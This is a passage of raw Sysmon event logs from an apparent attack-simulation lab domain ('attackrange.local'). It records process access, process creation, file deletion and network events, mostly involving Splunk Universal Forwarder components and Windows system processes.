Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048685Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048684Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.157{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:52.152{466BC892-F498-60EB-2B7D-00000000CF01}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.834{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8BE68A6B6E9BC4DA259CB206D0E1193F,SHA256=82B03D6ED3F6B04ED41D6663C3136C7770BB2B6C72CCFF737A00CDB64271DB5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.703{466BC892-F499-60EB-2D7D-00000000CF01}102244332C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.518{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.503{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.504{466BC892-F499-60EB-2D7D-00000000CF01}10224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:53.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA72A19A2649004CE2C341CCC606F20A,SHA256=05612726FA58DC7F4B24FDBD1F5624C493D1567243C908850F445872552758C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:52.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57259-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:53.254{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01CE00DB4C00E50FC289E26C925280F2,SHA256=9EF894656572DAC61630DE0BB5378F21F6FE88B4ABE7C9BC2935376541186466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.986{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2E704CBD70F6E97E0242DF303EEA99,SHA256=553E7BC1599D65B8533DBB9BBB25BE2B2A3FD9BAD63C7D37E9DCDD996F543BB6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.971{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.971{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.971{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-327D-00000000CF01}6188C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:54.955{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+3c57|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|